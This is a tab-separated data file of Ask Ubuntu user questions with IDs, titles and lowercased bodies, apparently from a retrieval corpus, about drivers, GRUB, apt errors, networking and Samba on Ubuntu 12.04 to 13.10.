362690	drivers for ubuntu 13.10	i just installed ubuntu 13.10 , my screen resolution is not fitting my screen as the ubuntu interface is all around stretching over the screen , so i thought i might install nvidia 's driver that i know can let me adjust the exact resolution i need . so i began a 2 hour quest , i downloaded the driver hoping i would have a wizard to instal it , but yeah , so i tried to do a bit of research and i found that feature , i think its called in english additional drivers , but it wont show the nvidia drivers , i tried the terminal , but once i write the commands i found it asks for a password but i cant type anything once the password is asked . so , my question , obviously , how do i install this driver ? i am not sure if this is appropriate , but why doesnt ubuntu have a wizard to install things ? i feel like im working for the os , when it should be the other way around , but i love the concept of linux , so im pushing forward and trying to use it . another thing is , i had to install a bunch of drivers and applications for the drivers in windows , do i need to install any other driver ? i cant change my mouse 's sensibility in the os , it seems , so how do i do it ? i 'm sorry i 'm asking all of this , but it seems necessary .
362696	should i use a separate 'admin ' user as my `` root sudo '' or grant sudo to my 'app ' user ?	i 'm still wrapping my brain around the ubuntu 'nullify root ' user management philosophy ( and linux in general ) and i 'm wondering if i should 'replace ' my root user with a user called 'admin ' ( which basically has all the powers of the root , when using sudo ) and create another user called 'app ' that will be the primary user for my app . here 's the context : i 'll be running a lnmp stack on ubuntu 12.04 server lts . there will be only one app running on the server . the 'app ' user needs to have super privileges for mysql . php will need to be able to exec ( ) shell commands . the 'app ' user will need to be able to transfer files via sftp . and i 'm thinking this would be the best approach : nullify 'root ' user create a user called 'admin ' that will be a full sudoer of root , this will be the new `` root '' user of nginx , php , and mysql ( and all system software ) grant super privileges to 'app ' in mysql grant sftp privileges to only the 'app ' user . as i 'm new to this , and the information i 've found in researching it tends to be of a more general nature , i 'm wondering if this is a solid approach , or if it 's unorthodox in a way that would cause issues down the road . thanks in advance for any help .
362701	user password i did n't even know of	i 'm a new user of ubuntu and i installed it on my computer using virtual box . i 've been trying to install java jdk for the past two hours without any success because when i try to do so , terminal asks for my password , which i do n't even remember creating . can someone please help and tell me how am i suppose to change the password in order to install jdk ? it will be very much appreciated , thank you .
362703	using macro keys with razer blackwidow ultimate 2013	i recently bought a razer blackwidow ultimate 2013 keyboard . the keyboad contains 5 macro keys and according to the manual , they can be quickly set using the key combination fn+f9 . however , this does n't work ; it wo n't record any macros . all the other function buttons on the keyboard work fine ( e.g . volume up , volume down , stand-by ) does anyone know how i can enable those keys ? maybe an extra package . i am using 64 bit ubuntu 12.04 thanks in advance : )
362705	how can i uninstall the last update ?	the last update for ubuntu 13.04 and 13.10 keeps the authentication service from opening . ca n't use synaptic or tweak or software center . this only affects the mate desktop .
362708	digital ocean lamp stack z-panel installation â can not execute binary fileâ on ubuntu 12.04	having an issue installing z-panel on a digital ocean vps running unbuntu 12.04 . specifically , when i try to execute the installer i get the following error : installer-10-1-0-ubuntu-64.sh.x : can not execute binary file . can anyone shed any light on this error ? i 've re-attempted the install about five times with no luck . thanks .
362711	how to use unity-scope-sshsearch ?	i used unity-lens-sshsearch on 12.04 , 12.10 and 13.04 . but after upgrading to 13.10 it 's not working any more . ( super+h does nothing ) as the lens package is not available on 13.10 i installed unity-scope-sshsearch ( successor of the lens ? ) but do not get any results in the dash for query 's like user @ host , hostname , 192.168 ... and so on . my ~/.ssh/config look 's like this : host user @ hostname hostname 192.168.1.1 user user already tried it with a newly created user , still no results . how is unity-scope-sshsearch intended to work ?
362712	login loop in 13.10 after installing amd propietary driver	just installed amd propietary drivers using this method . when i rebooted after install i was not able to login to the desktop . once the password is entered , it displays a black screen and loops back to the login screen . i also used the multi monitor config for xorg .
362714	ca n't install any packages on natty server	ca n't install upgrade or update any ... e : some index files failed to download . they have been ignored , or old ones used instead . -- e : unable to locate package
362717	skype crashes , also audio problems 13.10	ive always had problems with skype ususally with audio , trying to keep the usb headphones set correctly . wha tive found is that when i see the pulseaudio server in the audio list in skype , and thats my only option , skype works good , ... stable and reliable . second issue : its been crashing a bit , just locks up and the only thing to free it up is a reboot , .. these problems are under the new release 13.10. so concider this a bug report . developers : you all need to make a good channel for people to report bugs , ... . ok thats all/
362720	`` sudo update-grub '' does n't work	when i run sudo update-grub i get the following error : /usr/sbin/grub-mkconfig : 1 : /etc/default/grub : # : not found this is my /etc/default/grub : # if you change this file , run 'update-grub ' afterwards to update # /boot/grub/grub.cfg . # for full documentation of the options in this file , see : # info -f grub -n 'simple configuration' grub_default=0 grub_hidden_timeout=0 grub_hidden_timeout_quiet=true grub_timeout=5 grub_distributor=`lsb_release -i -s 2 > /dev/null || echo debian` grub_cmdline_linux_default= '' quiet splash '' grub_cmdline_linux= '' splash quiet '' # uncomment to enable badram filtering , modify to suit your needs # this works with linux ( no patch required ) and with any kernel that obtains # the memory map information from grub ( gnu mach , kernel of freebsd ... ) # grub_badram= '' 0x01234567,0xfefefefe,0x89abcdef,0xefefefef '' # uncomment to disable graphical terminal ( grub-pc only ) # grub_terminal=console # the resolution used on graphical terminal # note that you can use only modes which your graphic card supports via vbe # you can see them in real grub with the command `vbeinfo' # grub_gfxmode=640x480 # uncomment if you do n't want grub to pass `` root=uuid=xxx '' parameter to linux # grub_disable_linux_uuid=true # uncomment to disable generation of recovery mode menu entries # grub_disable_recovery= '' true '' # uncomment to get a beep at grub start # grub_init_tune= '' 480 440 1 ''
362721	permission issues causes unity segmentation fault	i upgraded from 13.04 to 13.10 and i can boot to the unity-greeter and login just fine , but after login i just get a black screen with a cursor . i have tried following http : //help.ubuntu.com/community/binarydriverhowto/ati http : //help.ubuntu.com/community/radeondriver and the manual install of the downloaded amd drivers . all have the same affect . also i have read black screen after login with cursor i get a black screen after logging in ubuntu 13.04 black screen after login ubuntu 13.10 - black screen after login session ubuntu 13.04 - black screen with unresponsive cursor upgrade to ubuntu 13.04 problem - boots into blank black screen all of which were no further help then the two support articles about ati drivers so i switched back to the default drivers and went a little further into debugging , when i do ctrl+alt+f1 and login and try unity -- debug > unity_start.log then ctrl+alt+f8 the screen stays black with a cursor and when i switch back ctrl+alt+f1 the contents of the log output are http : //pastebin.com/rdqg4hb0 however when i try sudo unity -- debug > unity_start_root.log then ctrl+alt+f8 , unity starts and the output of the log is http : //pastebin.com/yv4rd2j7 the fact that it starts as root tells be it is either a permissions issue of some required file or there is some setting that is specific to my user that is causing the sigsegv . so to narrow this down i activated the guest account and tried to login and got the same black screens with only a mouse cursor , so this tells me that it is not a configuration issue , but a permissions issue , so how do i narrow down which file has the wrong permissions ? also is there anything further that may help debug this issue ? ok after a few more hours of googling i found that if i add myself to the video group i can login and see the desktop , but there are lots of other permission related issues , so i am thinking something went wonky with policykit during the upgrade , is there a way to reset policykit settings for a user ?
362722	how to fix splash screen in all ubuntu releases !	how to fix black splash screen or broken splash screen after installation of nvidia proprietary drivers in ubuntu ( it happens usually in all ubuntu releases ) ? it 's no matter what version of nvidia drivers i install bug is always present .
362723	can i found out that somebody killed my process ?	i have a script that i start in the background . few hours later , process is not running anymore . is there any way to find out that somebody killed my process and that it did n't die by itself ? thanks a lof .
362726	cr-48 screen resolution	i have a chromebook ( cr-48 ) that i have installed ubuntu 12.04 on it . everything works fine except the screen resolution is fixed at 1024*768 , whereas the native resolution is 1280*800 . how can i change the screen resolution to the native one ? here is the output from xrandr : xrandr -q xrandr : failed to get size of gamma for output default screen 0 : minimum 800 x 600 , current 1024 x 768 , maximum 1024 x 768 default connected 1024x768+0+0 0mm x 0mm 1024x768 61.0* 800x600 61.0
362732	how to fix missing panel indicators in 13.10	after moving from 12.04 to 13.10 ( with unity ) , the majority of my applications no longer have panel indicators . e.g : - xchat - sonata xchat gets a link in the mail menu , but this is useless because it opens a new xchat instance each time it 's clicked , rather than bringing up the existing one . i understand that this is a change from 13.04 to 'tidy up ' the notification area , but it 's super frustrating . is there any way to force the old behaviour so that all of my applications can have status indicators ?
362735	multipath routing with only one interface	i have two links that connect to internet in my office network . one of the routers has ip 172.16.0.1 and the other has 172.16.0.3 . they connect to internet using ppoe so they get an ip each time they connect . i configured incomming traffic in a way that every that comes from the external ip will be routed to 172.16.0.120 . in 172.16.0.120 there is a webserver so i have load balancing and link failover . the problem is that it seems i 'm unable to tell 172.16.0.120 to route packets from the gateway they come from . and it seems that if i try one link or the other there is only one active ( not really active , the packet are always sent through the same router ) . it depend on the route i add last . what i do is something like this : ip rule add from 172.16.0.1 table 1 ip rule add from 172.16.0.3 table 2 ip route add 172.16.0.0/24 dev eth1 scope link table 1 ip route add 172.16.0.0/24 dev eth1 scope link table 2 ip route add default via 172.16.0.1 dev eth1 table 1 ip route add default via 172.16.0.3 dev eth1 table 2 ip route add default scope global nexthop via 172.16.0.1 dev eth1 weight 1 nexthop via 172.16.0.3 dev eth1 weight 1 with this is supposed to send packets where they come from . but it 's not working . maybe some iptables magic is needed here .
362737	how to reset the channels and get back to the stable release	i am unable to update , and add repos . i upgraded to ubuntu 13.10 , but it now says i am using the developmental trusty channels , and i need some advice on how to reset the channels and get back to the stable release .
362739	mouse pointer no responding fast ?	the pointer/cursor not responding in the same speed as i move the mouse acting slow , even in the fastest speed still no responding fast as i move the mouse any idea what is the problem on this anybody ?
362740	can not run sudo apt-get update	i am unable to run the sudo apt-get update command as well as install any packages . here is the return from sudo apt-get update : sabo @ ace : /etc/apt $ sudo apt-get update err h ttp : //security.ubuntu.com precise-security release.gpg could not connect to ace:80 ( 127.0.1.1 ) . - connect ( 111 : connection refused ) err h ttp : //us.archive.ubuntu.com precise release.gpg could not connect to ace:80 ( 127.0.1.1 ) . - connect ( 111 : connection refused ) err h ttp : //us.archive.ubuntu.com precise-updates release.gpg unable to connect to ace:80 : err h ttp : //us.archive.ubuntu.com precise-backports release.gpg unable to connect to ace:80 : reading package lists ... done w : failed to fetch h ttp : //us.archive.ubuntu.com/ubu ntu/dists/precise/release.gpg could not connect to ace:80 ( 127.0.1.1 ) . - connect ( 111 : connection refused ) w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-updates/rel ease.gpg unable to connect to ace:80 : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-backports/r elease.gpg unable to connect to ace:80 : w : failed to fetch h ttp : //security.ubuntu.com/ubuntu/dists/precise-security/rele ase.gpg could not connect to ace:80 ( 127.0.1.1 ) . - connect ( 111 : connection ref used ) w : some index files failed to download . they have been ignored , or old ones used instead . any help at all is greatly appreciated , i 've been unable to figure out the problem for some time .
362742	apt-get update failed for some reason	when i run this command sudo apt-get update i get an error : jan @ janos : ~ $ sudo apt-get update e : type 'ain ' is not known on line 3 in source list /etc/apt/sources.list.d/gwendal-lebihan-dev-cinnamon-stable-precise.list e : the list of sources could not be read . i tired to install nemo . and then this happened after i added the ppa . i ca n't even purge it . how can i fix this ? for some reason the software center does not want to open anymore also . another thing when i check for updates . i get this .
362744	i ca n't add a flash player to midori	how can i install libflashplayer.so ? i did it put in /usr/lib/midori/ and midori shows it at preferences-extensions in the list , but it is to read : can not open shared object files . maybe is the file wrong because is it very longer than other files there ( 7.7mb ) . the other way is to install via apt-get install flashplayer , but i do n't now how to find / change a package source . can anybody describe how i can get a working flash player ? thank in advance egon
362745	how to install h.265 / hevc codec on ubuntu linux ?	i have seen that the new divx player 10 shows off h.265/hevc playback , the successor of h.264 . i wonder how i may get this support in linux . is there a need to install a codec specific for this format ? how ? thank you .
362751	how to boot ubuntu alongside windows 8.1 , not modifing windows bootloader ?	i know there 's a few questions have been asked similar to this one , but i did n't find what i wanted . i want to install ubuntu 13 ( 13.10 ? ) alongside windows 8.1 . the thing is ubuntu does n't recognize windows . i want to install ubuntu on ssd ( windows is on hdd , hdd is primary ) and be able to run ubuntu when i need ( i do n't wan na choose everytime on startup ) . as far as i know ubuntu will try to write boot file to the primary disk ( hdd in my case ) , and i 'm afraid it will rewrite boot files from windows . so will it rewrite or not ? should be i afraid of something else ?
362753	application switcher next , previous , up , down shortcuts in 13.10	i 'm missing these options in 13.10 ccsm : now that i upgrated to 13.10 , i ca n't find those options at all . they do n't appear anymore in ccsm . were they removed in 13.10 ? how can i get those back ?
362757	i ca n't connect to the internet through wi-fi	i ca n't connect to the internet through wi-fi , when i try to connect it sends a message : `` network disconnected '' ( update my version of ubuntu from 13.04 to 13.10 through wired connection )
362760	how do i recover my files ?	when installing ubuntu not touched me go in advanced settings therefore losing my backup partition , i want to know any way to recover my files this is very important ... sheltered original post in portuguese : http : //askubuntu.com/revisions/362760/1
362761	after suspend , screen milky , misty	i installed a dual boot with 'refit ' on my very early intel imac ( '7,1 ' ) ... ubuntu 13.10 works very well - except , if i let the machine go to suspend , then when i come back from suspend the screen is ... milky . that is to say , everything works fine , i can see the screen , but it is like there is a white layer on top of the screen set at about 50 % transparent . i do n't think that it is brightness , it is that everything is pale . apologies , i do n't have the machine in front of me , but when i boot up i see a very brief message about the radeon driver - there is a number and a message to the effect that a rom is missing . maybe i do n't need suspend , i am open to suggestions about how to make it so that the computer just powers down nicely if i leave it unattended . but it seems that simply blanking the screen leaves the hard drive spinning and generally things are warm and on ...
362764	low disk space and can not boot	i have been running 12.04 on a virtual box vm for some time . it 's my main development machine , so quite important . the disk size is 8gb . recently i started to get pop-up warnings about low disk space . i cleaned up what i could and kept going . the messages would stop for a while , then start again . this morning my ide ( phpstorm ) started complaining that it was out of disk space and could not save changes . this seemed odd to me , since the alerts had just started again and were reporting that i had 200mb left . ( in past days i have received alerts with less than 100mb left , but have still operated ok ) . anyhow , i did some quick research and decided that i needed to resize the vm disk and then run gparted . in preparation for this , however , i stopped the machine to make a clone of it . now , neither the clone or the original machine will boot . they just hang with a cursor flicking in the top left . i 'm sure there are a number of ways to deal with this , but i 'd like to get a handle on the options before i rush in . any ideas ?
362766	pcsx2 1.0.0 installation issues	i 've followed all the tutorials i can find to get this emulator to work and i 'm now getting this error . granted i 've gotten a lot further than when i started . running 13.10 . just downloaded the linux download file from the pcsx2 website and did the following in terminal : jonathan @ assassin : ~ $ sudo add-apt-repository ppa : gregory-hainaut/pcsx2.official.ppa [ sudo ] password for jonathan : the official pcsx2 ppa , provided by the pcsx2 team . this ppa contains a regular package snapshot of pcsx2 . we are not package experts , but we try to follow the debian policy . press [ enter ] to continue or ctrl-c to cancel adding it gpg : keyring `/tmp/tmpe5fwdz/secring.gpg ' created gpg : keyring `/tmp/tmpe5fwdz/pubring.gpg ' created gpg : requesting key 7a617ff4 from hkp server keyserver.ubuntu.com gpg : /tmp/tmpe5fwdz/trustdb.gpg : trustdb created gpg : key 7a617ff4 : public key `` launchpad official ppa for pcsx2 team '' imported gpg : total number processed : 1 gpg : imported : 1 ( rsa : 1 ) ok jonathan @ assassin : ~ $ sudo apt-get update err http : //ppa.launchpad.net saucy/main amd64 packages 404 not found err http : //ppa.launchpad.net saucy/main i386 packages 404 not found fetched 67.4 kb in 16s ( 3,977 b/s ) w : failed to fetch ppa.launchpad.net/gregory-hainaut/pcsx2.official.ppa/ubuntu/dists/saucy/main/binary-amd64/packages 404 not found w : failed to fetch ppa.launchpad.net/gregory-hainaut/pcsx2.official.ppa/ubuntu/dists/saucy/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . jonathan @ assassin : ~ $ sudo apt-get install pcsx2 reading package lists ... done building dependency tree reading state information ... done e : unable to locate package pcsx2 so i 'm assuming i just need the way to get the two missing packages ?
362769	new installation not letting me boot to windows	i have an hp pavilion running windows 7 . not wanting to make any changes to my 1tb hard drive , i installed ubuntu 13.10 on a separate 40gb hard drive in the same computer . after installation , i can neither boot to the windows drive or select the windows drive from the grub menu . grub menu only shows options for ubuntu . i have tried booting to the windows drive from the bios , but it simply passes it right up like its not there and boots to the ubuntu drive . the only way to boot to windows is to disconnect the ubuntu drive itself , but i do n't want to open the tower every time i want to switch between them . looking for some help . can i get the ubuntu drive to recognize the windows drive maybe ?
362771	how can i install ubuntu on my ntfs hdd without formatting ?	my hdd is just one partition in ntfs ( 500gb ) and 430 gb is used by my photos/movies/music etc which i never will want to lose . actually i installed ubuntu on a usb flash drive ( using it right now ) but it is too slow that way . but my problem is : my computer is damaged ( maybe chipset or but not sure ) and none of the windows versions ( xp , vista,7 ) works on my pc . i get blue screen error as soon as windows startup logo shows . but ubuntu just works flawless . that means i can not use wubi . i wanted to shrink my hdd without losing data ( which can be done in windows ) but found nothing about that on ubuntu forums . is this possible ? or install ubuntu on my ntfs filesystem ? note : i do n't have chance to backup 400 gbs of data . sorry for my question if it 's written a bit compex . i hope you get the point and someone has an idea ; )
362774	trouble with web browsers	randomly one day i turn on my computer into ubuntu and all of a sudden firefox ( my browser of choice ) keeps opening on its own , and if i let it will open 100+ instances of firefox so i had to uninstall it . so then i try google chrome and it starts doing the same exact thing . so i uninstall that and try chromium and whadya know , same thing . then i try opera and strangely enough , it works just fine . but to my dismay i find opera to be a slow alternative , not very good and often unresponsive . so i really want to use firefox its my favourite browser . and this clearly seems to be a problem with the os not the specific software . this problem makes my installation of ubuntu virtually useless so if anyone has had this same problem or knows any sugestions it will be much appreciated thanks .
362780	where is my new gnome 3.10 software ?	after upgrading to gnome 3.10 via the gnome3 and gnome3-staging i do n't see the new software center , maps or any of the new software jazz that is suppose to come with gnome 3.10 . i see the window and top menu changes and it states i am running gnome 3.10 in the system details app . so where are my new apps that are supposed to be part of gnome 3.10 ? as seen here
362782	13.10 wo n't load any web pages	after my upgrade to 13.10 ( saucy salamander ) fire fox wo n't load any pages , not even the startup page i continuously get a `` server not found '' error . what could it be ? i 've looked and no one else has asked about this problem
362786	ssh : dynamic dns vs port forwarding	i recently set up ssh on my newly installed ubuntu , and already set up public key authentication and know that it works properly remotely on my local network . now i decided that i would make it available to myself outside my lan , so i 'm wondering whether to use the router port-forward way or the no-ip/dynamic dns way . ( if the server is n't already online automatically ) which one is more preferred , from a security standpoint and in general ? ( or is it already made available online from when i originally installed it ? ) -thanks
362787	my dvd drive is n't recognized	i installed ubuntu 13.10 . when i try to use the dvd drive , it does n't work . i tried to mount it manually with the command line , but that does n't work . my system is intel core 2 quad integrated intel graphics card 2 gb of ram motherboard biostar
362789	how do i make a complete bootable iso of my system ?	exactly as the title posts . i want to make a completely bootable iso of my system incase something breaks . not just the files but the whole system !
362790	xubuntu 13.10 xfce4-power-manager not working	i found that if xfce4-power-manager does not work if it is started with /usr/bin/xfce4-power-manager , the process is there but no power icon would be shown , the power manager in settings does not work either . however if i start xfce4-power-manager with command xfce4-power-manager -- no-daemon option , everything works normally . is there anyone facing the same problem ?
362792	how to install sis 771/671 video drivers on 13.10 ?	i 've been trying for sometime to install sis 771/671 pcie drivers and could n't find any info . sis web page does n't have a specific driver for this board , i has drivers only for sis 650/740 and 630/730 boards and redhat only . anyone has any idea on how i install these drivers ? thanks : )
362793	asus g75vx / xubuntu 13.10 efi installation blank screen	i am trying to install xubuntu 13.10 on a g75vx laptop which has windows 8 pre-installed . so my installation has to be in efi mode . i 've had xubuntu 13.10 installed in it for a while on a different hard drive and it worked just fine . when i try to install in efi mode it boots but i get a blank screen after booting . adding nomodeset to grub like i 've done to install in legacy mode will not resolve the issue . this installation will have the following : efi boot. can not install legacy mode due to pre-installed windows 8 ubuntu will be installed on a secondary hdd by itself along with windows 8 on primary hdd . nvidia graphics gtx670mx . any help will be greatly appreciated .
362794	ca n't recognize second ethernet card tap-win32 provider oas	i 'm running win 7 , and i tried to add one more ethernet card for testing in virtualbox , i have old one ( tap-win32 provider oas - i do n't remember name of card but i see it in device manager ) , so i use it for testing . my trouble is win 7 & virtualbox recognize it , but when in debian 7 / ubuntu server and desktop 13.04/13.10 - it show that the eth down , i had tried to ifup , and just plugin the second one , but it still do n't auto get the ip from dhcp . i do n't know the problem by my old card or from ubuntu , if from my card , i 'll buy new thing , but if from server , i hope can solve it . thanks for any help : )
362796	list.save and list.distupgrade	this is more of a curiosity question as i try to get a better understanding of apt and package management . i 'm seeing that in my /etc/apt/ and /etc/apt/sources.list.d/ folders i have very or sometimes identical files which have the extension of sources.list , sources.list.distupgrade , sources.list.save , and so on . what 's the point of these duplicate or similar files ? sources.list and sources.list.save in /etc/apt/ seem to be identical but sources.list.distupgrade shows quantal instead of raring for most stuff ( i probably first installed quantal ) . on the other hand , in the case of google-talkplugin.list and google-talkplugin.listupgrade in/etc/apt/sources.list.d/` the content of the files seems to be completely identical . did n't find much in google searches . i reviewed the sources.list manpage but it did n't talk much about it . also noticed this article where a bug related to the extensions was noted for 10.10
362798	can not connect to internet in 13.10	i just upgraded to ubuntu 13.10 from 13.04 . since then i have n't been able to connect to the internet . i can see the wireless networks in my area , but when i click on mine it wo n't connect . when i plug my laptop directly into my ethernet it still wo n't connect . any one have any ideas how to resolve this ? ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 07 ) network controller : ralink corp. rt3290 wireless 802.11n 1t/1r pcie if you need any more info let me know .
362800	how can install a driver for touchpad of laptop asus x53u ?	i installed ubuntu 12.04 , i switched windows 7 for this . help me please .
362801	browser wo n't load any pages after 13.10 upgrade	after my upgrade to 13.10 ( saucy salamander ) firefox wo n't load any pages , not even the startup page . i continuously get a `` server not found '' error . what could it be ? i 've looked and no one else has asked about this problem . also i have removed and installed firefox from terminal . but after doing so , it wo n't let me install it again , giving me an error saying unable to fetch some archives
362804	command to view containing folder of an application in ubuntu	which command is used to view containing folder of an application ? for example , i installed emacs , chrome , ... on my computer , now i want to view folder that holds them . how can i do that via terminal ? thank you so much !
362807	what should i install on 12.04 for a school ?	i am in charge of installing linux on all windows xp laptops in my school . i chose ubuntu 12.04 lts , but i am not sure what i should install on it . do you guys have any suggestions ? thanks
362815	configuring usb modem ( huawei ec156 ) in ubuntu 13.10	i am facing difficulty in installing my usb modem in ubuntu 13.10 . contrary to what many have suggested , it does not get detected automatically , nor does setting a new connection help . usb device is listed in lsusb , but not under network manager or devices , it is detected as a cd-rom , what i understood from the web was that usb-modeswitch can be used to switch it to a usb device . even 'enable mobile broadband ' option is not shown in network manager . what was interesting is when i start laptop with windows 7 and use the usb modem and after that restart with ubuntu , both enable broadband and the mobile broadband connection can be seen . sadly , internet connection could not be installed . i tried using usb-modeswitch command as suggested somewhere , but it does not seem to work . following is the message . take all parameters from the command line * usb_modeswitch : handle usb devices with multiple modes * version 2.0.1 ( c ) josua dietze 2013 * based on libusb1/libusbx ! please report new configurations ! defaultvendor= 0x12d1 defaultproduct= 0x1505 huaweimode=1 needresponse=0 inquiredevice enabled ( default ) look for default devices ... found usb id 8087:0020 found usb id 1d6b:0002 found usb id 0461:4db6 found usb id 12d1:1505 vendor id matched product id matched found usb id 138a:0007 found usb id 03f0:231d found usb id 8087:0020 found usb id 1d6b:0002 found devices in default mode ( 1 ) access device 005 on bus 001 get the current device configuration ... ok , got current device configuration ( 1 ) use interface number 0 use endpoints 0x08 ( out ) and 0x87 ( in ) inquire device details ; driver will be detached ... looking for active driver ... ok , driver detached inquiry message failed ( error -9 ) usb description data ( for identification ) -- -- -- -- -- -- -- -- -- -- -- -- - manufacturer : hua ? wei technologies product : huawei mobile serial no . : ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? -- -- -- -- -- -- -- -- -- -- -- -- - send old huawei control message ... - > run lsusb to note any changes . bye ! i am stuck with this problem for 4 days now , any help would be appreciated
362817	nexus 4 < waiting for device > problem	i have followed the instructions to install to the letter . everything seems to go well until the restarting device part . i keep getting a message wherein it almost immediately reboots to android 's bootloader . i 've removed phablet-tools and reinstalled and run the whole thing with apt-get update and upgrade and everything else mentioned . what am i missing here ?
362818	accidentally hit shortcut and lost text in web browser . can it be disabled ?	i have noticed that i occasionally hit some shortcut while typing that either kills the browser or otherwise causes me to lose e.g . a post i am writing . this typically happens if i type while on a bumpy road or something like that . it also just happened to my eight year old daughter ; - ( i think the shortcut in question is ctrl-w which ( at least in firefox ) closes the current tab and consequently whatever content is being written . i would like to know if anyone has noticed this and if someone has a solution e.g . a way to disable `` dangerous '' shortcuts if at all possible .
362820	12.04 server runs into grub `` unknown symbol type '' problem and i get stuck in grub rescue , how do i fix it ?	when i try to boot i get stuck in a grub rescue prompt , with the messgae : error : unknown symbol type '13 ' . grub rescue > _ i hard rebooted the server over putty , with the standard reboot command ( i think ) . how can i fix this and get my server to boot , since it runs my website ?
362829	script run fine in terminal , but not able to run through task scheduler	the below script run all fine it self , but not able to run with task scheduler . please suggest . i have tried executing the script in terminal and it runs fine . # ! /bin/bash # take screenshot import -window root $ home/screenshot.png # move to dropbox folder mv $ home/screenshot.png $ home/ $ ( date|tr `` : '' _ ) .png
362834	problem upgrading from 13.04 to 13.10	part way through upgrading from 13.04 to 13.10 the process ground to a halt with an error message . now on retrying by going to 'check for updates ' i get the following : failed to load the package list this is a serious problem . try again later . if this problem appears again , please report an error to the developers . e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_saucy_universe_i18n_translation-en % % 5fgb , e : the package lists or status file could not be parsed or opened . problem reported but my question is , `` what can i do now ? ; do i have to do a fresh install ? ; if so will settings etc . in my home folder ( on its own partition ) be saved ? '' 13.04 still seems to be working perfectly , while upgrading i had a terrible internet connection varying between 'dead slow ' and 'dead stop ' , not sure if that caused the problem .
362843	how do i configure a belkin n52te gamepad to work ?	i was wondering how i could possibly get my belkin n52te gamepad working on this version of ubuntu - ubuntu 13.10 ?
362844	ubuntu : how to change the right click `` open with '' application order ?	i am using ubuntu 10.10 maverick , when i try to open a plain text file using a program x , i do right click to access the `` open with '' application list . suppose my current `` open with '' list is like below -- application z application y application x but i want it to be like -- application x application y application z i.e . i want to change the order of the list . i know that i can fix a `` default program '' for a particular file , but that 's not what i am looking for . my question is which file defines this `` open with '' preferences ? and if there is any way to tweak it . any idea ?
362845	dash becomes black after startup in saucy	it also happens when i log out and log in . it did not happen in raring or saucy beta 2 . i have intel 's integrated gpu and no additional drivers . unity never behaved weird before in my computer . is there any workaround ?
362848	after windows , ubuntu installation with hd repartiton & reformat fail	i had windows 7 running on a lenovo sl400 laptop without uefi ( double checked ) with ntfs/mbr set up . an install of ( md5-checked ) ubuntu 13.04 server ( note that , no gui ) from a flash drive resulted in no boot , no details as to what was going on , just a white blinking underline cursor on a black screen . i then used a dos booting flash drive to reformat the hard drive to fat32 , then reinstalled ; failed again , same failure . so , i loaded bodhi onto the flash drive , used it to wipe the hd with dd then ran badblocks +w to completely scrub the drive before putting ubuntu server 13.04 back on the flash drive and re-reinstalling ; failed again . it happens whether the bios is set to ahci or compatibility mode . it happens whether i use lvm or just ext4 & swap directly on the hard drive ( 500gb wd ) . how can i install ubuntu server successfully ? here 's more detail : http : //paste.ubuntu.com/6274751/
362849	ubuntu look like windows 7 ? themes	is there anyway to get ubuntu to look like windows 7 ? is there any themes out there to make this possible and if so how ?
362852	samba fails to add a user entry , how do i fix this ?	i was configuring samba and tried to add a domain user , but it returns this : failed to add entry for the user student these are the commands i 've done so far : frigate @ frigate-desktop : ~ $ su password : root @ frigate-desktop : /home/frigate # nano /etc/samba/smb.conf root @ frigate-desktop : /home/frigate # groupadd -g 201 machines root @ frigate-desktop : /home/frigate # mkdir -m 0775 /home/ntlogon root @ frigate-desktop : /home/frigate # mkdir /home/samba /home/samba/profiles root @ frigate-desktop : /home/frigate # chmod 1755 /home/samba/profiles/ root @ frigate-desktop : /home/frigate # useradd -m test root @ frigate-desktop : /home/frigate # passwd test enter new unix password : retype new unix password : passwd : password updated successfully root @ frigate-desktop : /home/frigate # smbpasswd -a test new smb password : retype new smb password : added user test . root @ frigate-desktop : /home/frigate # smbpasswd -a root new smb password : retype new smb password : added user root . root @ frigate-desktop : /home/frigate # smbpasswd -a student new smb password : retype new smb password : failed to add entry for user student . root @ frigate-desktop : /home/frigate # smbpasswd -a student new smb password : retype new smb password : failed to add entry for user student . root @ frigate-desktop : /home/frigate # smbpasswd -a stu new smb password : retype new smb password : mismatch - password unchanged . unable to get new password . root @ frigate-desktop : /home/frigate # smbpasswd -a stu new smb password : retype new smb password : failed to add entry for user stu . how can i add this user to samba ?
362853	power method script not running on startup	i recently made this entry asking about power profile . i followed the instructions which were liked in the answer . it worked . however it is not longer working after i reinstalled grub . this is what i did : gksu gedit /etc/init.d/ati-power-save saved file with this : # ! /bin/sh # ati power save echo dynpm > /sys/class/drm/card0/device/power_method ran this command : chmod a+x /etc/init.d/ati-power-save and it works when i just run the echo dynpm ... command . i see a flicker and can hear the fan slowing down . however it is not saved between reboots , when i restart my computer the previous power profile is set to default and i have to run the command again . running cat /sys/class/drm/card0/device/power_method prints profile instead of dynpm how can i make the setting permanent ?
362854	why can i telnet to localhost but not via i.p	i have just installed mythtv ( backend and frontend ) on my linx mint 15 machine . i can successfully watch live tv via the frontend . i can telnet from that machine : telnet localhost 6543 ifconfig tells me : wlan0 link encap : ethernet hwaddr 00:1f:3c:67:47 : bb inet addr:192.168.10.11 bcast:192.168.10.255 mask:255.255.255.0 but then i try this : telnet 192.168.10.11 6543 trying 192.168.10.11 ... telnet : unable to connect to remote host : connection refused why can i telnet to localhost but not to the ip address ? obviously , my aim is to access this port from another machine , but i can not even access it via ip from the local machine . my firewall is not running .
362856	what is the best software to keep record of my technical work ?	i need to keep records about my newly learnt things . basically i need to write more lines in that record book , like codes , links and such things . so can you tell me if there any app like that or if not are there any online resource ?
362862	i 'm stuck on installing kerio vpn client !	i just installed ubuntu 13.10 64 bit on my system . for some reason i need to use kerio vpn client on my system . but the problem is when i installed kerio vpn client on my system it removes software center and some packages and installed itself ! again i installed software center but during installation it removes my kerio package from system ! what causes this problem ? what should i do ? please help
